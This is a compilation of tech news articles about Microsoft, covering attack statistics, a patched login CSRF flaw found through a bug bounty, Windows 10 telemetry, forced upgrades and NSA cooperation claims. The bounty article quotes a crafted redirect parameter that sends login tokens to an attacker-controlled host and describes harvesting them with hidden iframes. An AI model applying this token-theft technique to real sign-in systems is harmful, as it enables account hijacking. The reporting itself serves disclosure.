Microsoft Faces Over 10 Million Attacks Everyday: Report

Microsoft servers face 10,000,000 attacks a day

A recent Security report from the company has revealed that Microsoft’s online infrastructure is tried to breach around 10 Million times in a day .

With Microsoft account and Microsoft Azure Active Directory services, the company helps regular users as well as corporates by providing them with a central identity.
The Identity Mechanism

The first service, your Microsoft ID which is also called Windows live ID is your gateway to access services such as Bing, Outlook.com, OneDrive, Windows Phone, Skype, Xbox LIVE, Windows 8.1, Windows 10, and many others.

This ID once hacked, can create serious troubles for the corresponding user. The problem may range from leakage of personal data on dark web to theft of important files and resources.

Microsoft’s second service for managing user identities is called Azure Active Directory (AAD) and is a commercial service offered to corporate entities. This service is a single sign-on system that grants users access to thousands of cloud (SaaS) apps such as Office 365, Workday, Box, Google Apps and more.

It is said by the company that 90 percent of the world’s 2,000 largest organizations use Azure Active Directory to manage user access to their cloud services. The company says it has 8.24 million AAD tenants, which in turn manage identities for 550 million users.
Attacks and Defenses

Out of 13 Billion authentications(per day), almost 10 Million are an attempt to intrude in someone’s account, the report says.

For Windows Live ID

The company has implied a profound channel for detection of breaching. This mechanism prevents unauthorized access even if the wrong person enters the right credentials.

First of all, an incorrect password lock out system is used which prevents user accounts from being brute-forced . Second there is a location based service which prevents login from suspicious locations.
For Azure Active Directory

AAD allows its users to create new identification policies added with those offered to Windows Live users. This provides an extra bit of security.

An elaboration of Microsoft’s Security implementation on AAD

“The capabilities […] are combined with other protection algorithms, data feeds from the Microsoft Digital Crimes Unit and the Microsoft Security Response Center, phishing attack data from Outlook.com and Exchange Online, and information acquired by partnering with academia, law enforcement, security researchers, and industry partners around the world to create a comprehensive protection system that helps keep customers’ accounts safe,” the company writes in its report.

But above all , no method is hundred percent fool-proof. Hence it is always necessary to follow security basics like choosing a strong password, changing it frequently etc.

Microsoft Pays $13,000 to Hacker for Finding Authentication Flaw

A security researcher has won $13,000 bounty from Microsoft for finding a critical flaw in its main authentication system that could allow hackers to gain access to a user's Outlook, Azure and Office accounts.

The vulnerability has been uncovered by UK-based security consultant Jack Whitton and is similar to Microsoft's OAuth CSRF (Cross-Site Request Forgery) in Live.com discovered by Synack security researcher Wesley Wineberg.

However, the main and only difference between the vulnerabilities is that: Flaw discovered by Wineberg affected Microsoft's OAuth protection mechanism while the one discovered by Whitton affected Microsoft's main authentication system.

Microsoft handles authentication across its online services including Outlook, Azure and Office through requests made to login.live.com, login.windows.net, and login.microsoftonline.com.

Now, for example, if a user browses to outlook.office.com, he/she redirects to a login.microsoftonline.com URL that contains 'wreply' parameter for specifying which domain the user wants to access.

How Does the Vulnerability Work?

If the particular user is already logged in, a POST request is made back to the domain specified in wreply with a value containing a login token for the user. The service the user wants to authenticate on consumes that token and logs the user in.

Whitton discovered that the authentication URL is vulnerable to cross-site request forgery (CSRF) attacks, allowing a malicious actor to create a specially crafted URL, which, when accessed by an authenticated user, would send the login token to a server controlled by the attacker.

The legitimate URL looks like this:

https://login.microsoftonline.com/login.srf?wa=wsignin1.0&rpsnv=4&wreply=https%3a%2f%2foutlook.office.com%2fowa%2f&id=260563

And the attacker could set the redirect to this:

https%3a%2f%2foutlook.office.com%252f@poc-ssl.fin1te.net%2fmicrosoft%2f%3f

The expert found that this would cause the login token to be sent to the attacker’s website, which in this case is poc-ssl.fin1te.net. Using the token, the attacker could have gained complete access to the targeted user’s account.

"The token is only valid for the service that issued it – an Outlook token can not be used for Azure, for example," Whitton noted in his blog post. "But it would be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way."

The good news is that Microsoft patched the vulnerability within two days after Whitton reported it to the company on January 24. The company also paid out $13,000 to the researcher as part of its bug bounty program.

Microsoft with its ‘Super Spy’ Windows 10 is collecting more data than thought before

The Redmond software giant Microsoft’s Windows 10 is fast becoming world’s preferred operating system over Windows 7 or 8.1. Despite its continued insistence that Windows 10 isn’t spying on anyone, Microsoft seems to have taken an interest in how much time you are using its Windows 10 operating system. However, Microsoft has done little to assure the majority of privacy conscious users that its latest operating system isn’t taking more data than it needs.

In order to emphasize its claim, Microsoft updated its privacy policy to clear how and when the OS makes use of user data. However, with its latest Threshold 2 Update, Microsoft is observing how long people are using the operating system and sending the data to Redmond.

The enthusiasm was shared by Microsoft in a blog post filled with data extracted from users.

On Monday morning, Yusuf Mehdi, Corporate VP of the Windows and Devices Group, disclosed that Windows 10 was active on over 200 million devices. The main factor that is contributing its quick growth is that is currently offered for free to existing Windows users on Windows 7 or Windows 8.1. So, it is really not astonishing if this is happening.

Microsoft felt the need to share some milestones to demonstrate the popularity of Windows 10:

1. People spent more than 11 billion hours on Windows 10 in December 2015.
2. 44.5 billion minutes were spent in Microsoft Edge across Windows 10 devices in December 2015 (0.71 billion hours).
3. Users asked Cortana more than 2.5 billion questions since launch.
4. More than 82 billion photos were viewed in the Windows 10 Photo application.
5. Windows 10 gamers spent over 4 billion hours playing PC games.
6. Gamers have streamed more than 6.6 million hours of Xbox One games to Windows 10 PCs.
7. About 30% more Bing search queries from Windows devices compared to previous versions of Windows.

Definitely, these are interesting statistics and could be troublesome for many privacy lovers.

“The statistics indicate that Microsoft may be collecting more data than initially thought,” writes Martin Brinkmann of ghacks. “While it is unclear what data is exactly collected, it is clear that the company is collecting information about the use of individual applications and programs on Windows at the very least.”

Data collection to a degree is unavoidable, as it occurs on every connected device. However, what is more bothersome about Windows 10 is that there is no clarity on what data is exactly being collected and there’s no easy way to turn it off.

According to Microsoft, the data collection in Windows 10 is for a greater good. It is being used to make the product work better and that is certainly true to an extent as the company is collecting information about the use of individual applications and programs on Windows to find out about the popularity of an application or operating system feature.

Still, since Microsoft does not reveal detailed information about what gets collected and to what end, it is something that users need to be aware about at the very least. We can only hope that while Microsoft celebrates its 2015 milestones, it looks to become more transparent in 2016.

[Latest] Microsoft Silently Re-Enables Windows 10 Upgrades on Windows 7 and 8.1 PCs

Microsoft's getting ready for the more aggressive upgrade phase of Windows 10 – when the new OS will show up first as optional, and then as recommended download in Windows Update – so the company has recently made some changes to Windows 7 and 8.1 PCs to make sure that more computers get it.

Basically, settings on PCs that were previously configured not to receive the upgrade to Windows 10 have been reset and it appears that one of the updates that Microsoft deployed on Windows 7 and 8.1 PCs keeps checking every day to make sure that no other changes are made to this behavior.

Update being re-offered several times

The information comes from the creator of GWX Control Panel, an application developed to block the upgrade to Windows 10.

"Over Thanksgiving weekend I started getting reports that the Windows Update 'AllowOSUpgrade' setting was getting flipped back on on a number of peoples' PCs, and it keeps re-setting itself at least once a day if they switch it back off," Josh Mayfield was quoted.

In other words Windows 7 and 8.1 computers can now easily receive the upgrade to Windows 10 and for the moment, there doesn't seem to be any other way to stop this from happening than to manually refuse the new OS.

It's all being made through recently-shipped Windows updates for older versions, and according to Mayfield, the very same update is being re-offered again and again.

"Microsoft has released this update several times," Mayfield continued. "It doesn't change the name of the update, but every version is new, with new binary files."

Starting in early 2016, seeing Windows 10 in Windows Update will be quite normal, as Microsoft changes its strategy and makes it an optional update for everyone. At a later time, the upgrade will become “recommended update,” so it becomes harder to avoid installing Windows 10 if you really wish to keep your computer fully patched.

Also See:

6.1 Million smart devices at risk from 3 year old flaw

Anonymous Accuses "Cloudflare" For Protecting ISIS Sites

Snowden Unveils NSA "God Mode" Malware That Lives On Your Motherboard And Can Not Be Traced

Critical Vulnerabilities Discovered in 3G/4G Modems Includes "Remote Code Execution,Cross-Site Request Forgery And Cross-Site Scripting"

Here's How Google Can "Remotely Bypass" Pattern Lock Of Android Device

Nmap7:The New Version Of Nmap Released After 3.5 Years

Microsoft helped the NSA to decrypt the encryption of "Outlook.com,Web chat, Hotmail service, and Skype".

Microsoft worked hand-in-hand with the United States government in order to allow federal investigators to bypass encryption mechanisms meant to protect the privacy of millions of users, Edward Snowden told The Guardian.

According to an article published on Thursday by the British newspaper, internal National Security Agency memos show that Microsoft actually helped the federal government find a way to decrypt messages sent over select platforms, including Outlook.com Web chat, Hotmail email service, and Skype.

The documents, which are reportedly marked top-secret, come in the wake of other high-profile disclosures attributed to Snowden since he first started collaborating with the paper for articles published beginning June 6. The United States government has since indicted Snowden under the Espionage Act, and he has requested asylum from no fewer than 20 foreign nations.

“The latest NSA revelations further expose the tensions between Silicon Valley and the Obama administration,” the journalists wrote. “All the major tech firms are lobbying the government to allow them to disclose more fully the extent and nature of their cooperation with the NSA to meet their customers' privacy concerns. Privately, tech executives are at pains to distance themselves from claims of collaboration and teamwork given by the NSA documents, and insist the process is driven by legal compulsion.”

In the case of Microsoft, however, it appears as if the Bill Gates-founded tech company went out of its way to assist federal investigators.